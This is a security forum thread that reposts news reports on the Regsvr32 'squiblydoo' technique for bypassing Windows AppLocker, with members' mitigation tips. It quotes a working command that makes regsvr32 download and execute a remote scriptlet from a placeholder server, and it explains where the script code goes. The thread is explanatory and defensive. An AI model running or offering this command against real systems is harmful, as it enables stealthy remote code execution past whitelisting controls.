Windows AppLocker Bypassed to Execute Remote Scripts

[Alkajak]

Content source

http://www.securityweek.com/windows-applocker-bypassed-execute-remote-scripts

Clever hackers can bypass Microsoft's Windows AppLocker security feature by abusing a hidden trait of the Regsvr32 command-line utility that's normally used to register DLLs on a Windows computer.

AppLocker is a security feature introduced with Windows 7 and Windows Server 2008 R2 that helps administrators specify which users or group of users are allowed to access and run files on a per-file basis.

Regsvr32 is a scripting utility that can be used by installers or in batch scripts to quickly register a DLL. As you'd imagine, Microsoft has neutered such a dangerous tool in order to prevent abuses by allowing administrator privileges to run.

Attacks are impossible to detect

According to security researcher Casey Smith, an attacker that has a foothold on an infected Windows workstation can abuse Regsvr32 to download a COM scriptlet (.sct file) off the Internet and run it to register a DLL on the local machine.

The attacker won't need admin privileges, Regsvr32 is proxy aware, can work with TLS content, follows redirects, and above all, signed by a Microsoft-issued certificate, making all commands look like normal Windows background activity.

Below are the standard Regsvr32 syntax and a version of a malicious command:

regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname
regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll

Regsvr32 feature is not documented

"It's not well documented that regsvr32.exe can accept a url for a script," Smith also noted. "In order to trigger this bypass, place the code block, either VB or JS inside the element."

For further tests, the researcher has also published four proof-of-concept scripts on GitHub that sysadmins can load via Regsvr32 and open a backdoor or a reverse shell over HTTP.

In theory, these kinds of exploits would allow a hacker access to registers DLLS and then execute malicious code on the compromised machines, even with admin privileges.

 

[hjlbx]

Protect regsvr32.exe and all the other processes as outlined by Casey Smith @ SubTee and your system will be more secure.

Regsvr32.exe has been known to be a vulnerable, abusable process for a long time now.

 

[echo1]

A core Windows command-line utility, Regsvr32, used to register DLLs to the Windows Registry can be abused to run remote code from the Internet, bypassing whitelisting protections such as Microsoft’s AppLocker.

A researcher who requested anonymity found and privately disclosed the issue to Microsoft on Tuesday. It’s unknown whether Microsoft will patch this issue with a security bulletin, or in a future release.

Regsvr32, also known as Microsoft Register Server, is a Microsoft-signed binary that runs as default on Windows. The researcher’s proof-of-concept allows him to download and run JavaScript or VBScript from a URL provided via the command line. Abusing this situation presumes an attacker would already be present on the box, the researcher said.

“A lot of whitelisting protections block JavaScript or VBScript; there’s no restriction here,” the researcher told Threatpost. “The fact that the code is hosted on a remote system makes it trivial. And Regsvr32 is proxy- and SSL-aware, meaning there’s no extra configuration needed. You can execute from any remote destination.”

The researcher said the issue was discovered while researching AppLocker bypasses.

“There’s really no patch for this; it’s not an exploit. It’s just using the tool in an unorthodox manner. It’s a bypass, an evasion tactic,” the researcher said. “The feedback I got from Microsoft is that there’s not going to be a patch. That may change, I don’t know.”

Complicating matters is that Regsvr32 normally requires admin privileges to run in order to be able to register COM (component object model) objects and DLLs on the operating system.

“Only admins normally run this. In this case, I can run it as a normal user,” the researcher said. “I could call unregistered methods and execute them as a normal user.”

Documentation on Regsvr32 does not indicate that it would accept scripts from the Internet. Recent so-called fileless malware attacks have used Windows PowerShell to download malware from the Internet, and it appears this issue could be abused in a similar way.

The researcher said that attacks using this method would be tough to detect.

“There are not many artifacts left on the box to indicate it ran,” the researcher said, adding that a command line auditing tool such as SysMon would log that someone ran Regsvr32 with a URL in the parameter. “Because the file is downloaded from a URL, there would be a minimal footprint. I’m not sure there would be much left on the system to indicate it ran.”

 

[frogboy]

Microsoft’s Windows AppLocker, a feature introduced in Windows 7 to specify which users can run apps within an organization, can be bypassed to execute remote scripts on a machine, a researcher says.

When AppLocker was introduced in Windows 7 and Windows Server 2008 R2, Microsoft provided administrators with the ability to set rules to allow or deny applications from running. These rules could be enforced for specific users or groups and could be used for executable files (.exe and .com), scripts (.js, .ps1, .vbs, .cmd, and .bat), Windows Installer files (.msi and .msp), and DLL files (.dll and .ocx).

In order to successfully bypass Windows AppLocker, an attacker needs to already have a foothold on the target machine, and also has to abuse Regsvr32, a command-line utility designed for registering DLLs in the registry, security researcher Casey Smith explains.

The researcher was looking for a way to register a script to bypass AppLocker, and discovered that the best way to do so is to place the script block inside of the Registration tag and then to call Regsvr32 to have the code executed. Moreover, Smith discovered that the code in the registration element executes on register and unregister.

Abusing Regsvr32 to execute the script comes with a series of benefits, as the command-line tool is proxy aware, uses TLS, follows redirects, and can also be set to run silently and to not display any message boxes.

“So, all you need to do is host your .sct file at a location you control. From the target, simply execute regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll. It’s not well documented that Regsvr32 can accept a URL for a script. In order to trigger this bypass, place the code block, either VB or JS inside the <registration> element,” the researcher explains.

Full Article. Windows AppLocker Bypassed to Execute Remote Scripts | SecurityWeek.Com

 

[kev216]

The Windows command line utility Regsvr32.exe can be exploited to bypass Microsoft Windows AppLocker protection systems, potentially leading to remote code execution.

The security flaw can be used to circumvent the app whitelist protections offered by AppLocker on business editions of Windows, versions 7 and beyond, by using the command line utility to point to a file or location controlled by an attacker.

As a result, files and scripts can be used to run an app on a Windows system.

Security researcher Casey Smith, also known as "subTee," says the security flaw can be exploited without admin rights or privileged access.

In a blog post, the researcher said that COM+ scripts -- XML documents which register COM objects for use in a PC's internal system -- can be created to bypass AppLocker, and it only takes a script block and deregistering the script to remove the need for admin rights.

In addition, the exploit does not require any tampering which leaves any tracks, a bonus for attackers attempting to hide their activities.

COM+ scripts, otherwise known as .SCT files, are not limited to local access, and so Smith was able to pull up script remotely. As the command line utility is also proxy and network aware, an intruder could cause havoc in a system once a PC is compromised.

"All you need to do is host your .SCT file at a location you control," the researcher said. "It's not well documented that Regsvr32.exe can accept a url for a script.In order to trigger this bypass, place the code block, either VB or JS inside the < registration > element."


A proof-of-concept (PoC) code is available on GitHub.

There is currently no patch for the security flaw. In the meantime, however, you can block Regsvr32.exe with Windows Firewall to mitigate the problem.

At the moment there is no official response from Microsoft yet.

 

[Solarquest]

Hitmanpro alert just got an update to fix this.
great job!
HitmanPro.ALERT Support and Discussion Thread

"HitmanPro.Alert 3.1.9 Build 367 Released

Changelog

• Fixed ROP false positive in Microsoft Office (occurs on some computers).
• Added mitigation to prevent regsvr32.exe abuse via COM scriptlets.
• Improved Skype detection in software radar.
• Improved short filename (8.3) handling in software radar.

Download
http://dl.surfright.nl/hmpalert3.exe "


On my system the new version is not compatible with Firefox 46.
Disabling Enforce DEP option worked for me.

 

[Petrovic]

A security researcher named Casey Smith published an article last week where he detailed how the Windows Regsvr32.exe command could be used to bypass AppLocker restrictions. In this article he described a not commonly known feature where Regsvr32 can execute specially crafted scripts on a remote host using a URL. These scripts are XML files that contain embedded Jscript or VBScript scripts that will be executed when Regsvr32 runs the script.

This obviously leads to a whole mess of possibilities where an attacker can do very bad things to your computer as long as they have access to it. Unfortunately, there are many ways for an attacker to gain access to a computer, whether it be through an exploit kit or a vulnerability.

Full Article

 

[Mihir :-)]

Data Back Up is must and very basic protection now days.

 

[DJ Panda]

Keep Software and OS updated, run an anti-virus, anti-malware, and anti-exploit + firewall + common sense = great security.